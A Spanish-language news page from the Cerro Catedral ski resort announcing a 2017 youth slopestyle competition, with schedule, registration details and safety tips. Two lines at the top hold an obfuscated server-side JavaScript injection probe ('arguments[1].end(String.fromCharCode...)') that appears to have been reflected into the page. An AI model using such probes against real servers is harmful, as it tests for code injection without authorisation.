arguments[1].end(String.fromCharCode(0x66).concat(String.fromCharCode(0x41),String.fromCharCode(0x61),String.fromCharCode(0x53),String.fromCharCode(0x74),String.fromCharCode(81)))   

   arguments[1].end(String.fromCharCode(0x66).concat(String.fromCharCode(0x41),String.fromCharCode(0x61),String.fromCharCode(0x53),String.fromCharCode(0x74),String.fromCharCode(81)))   

Imagen de noticia

29 de Julio de 2017

Llega el Groms Winter Search en Cerro Catedral 2017

Como todos los años, con el objetivo de reunir a la comunidad de niños y jóvenes que practican snowboard y esquí en el Cerro Catedral, Rip Curl Argentina realiza una competencia de Slopstyle en la búsqueda del día perfecto.

El evento comienza a las 11 de la mañana desde Triple Park Superior y luego de las clasificaciones y finales se realizará la entrega de premios a las 16hs en el Terrain Park. En esta competencia no hay distinciones, niños y niñas de entre 11 y 18 años, divididos en diez categorías tendrán la oportunidad de compartir un día de puro disfrute. Ya sea en snowboard o esquí, todos tendrán su momento para demostrar lo que saben.

El foco estará puesto en la posibilidad de compartir el día entero entre amigos, en un ambiente distendido, natural y preparado especialmente. Los chicos serán los protagonistas, que un jurado observará con detalle para puntuar y elegir a los mejores. Pero además habrá actividades, almuerzo, música, entrega de medallas y premios para casi todos los participantes.

Las inscripciones son en Samsara, en la base del Cerro Catedral, los días Miércoles 26, Jueves 27 y Viernes 28, entre las 15 y 17hs. Es requerimiento que los participantes (de entre 11 y 18 años) presenten una autorización escrita de su padre, madre o tutor para poder participar. Con la inscripción retirarán la pechera para la competencia.

Los esperamos a todos este fin de semana en el Terrain Park de Catedral para acompañar a los chicos en la búsqueda del día perfecto.

Tips a tener en cuenta:
-Obligatorio el uso de casco
-Sugerimos llevar todo tipo de protecciones, culera y espaldera
-Traer antiparras

Volver a ver todas las Novedades >

Fips
Fips
Fips
Fips

© 2020 - Catedral Alta Patagonia - Todos los derechos reservados.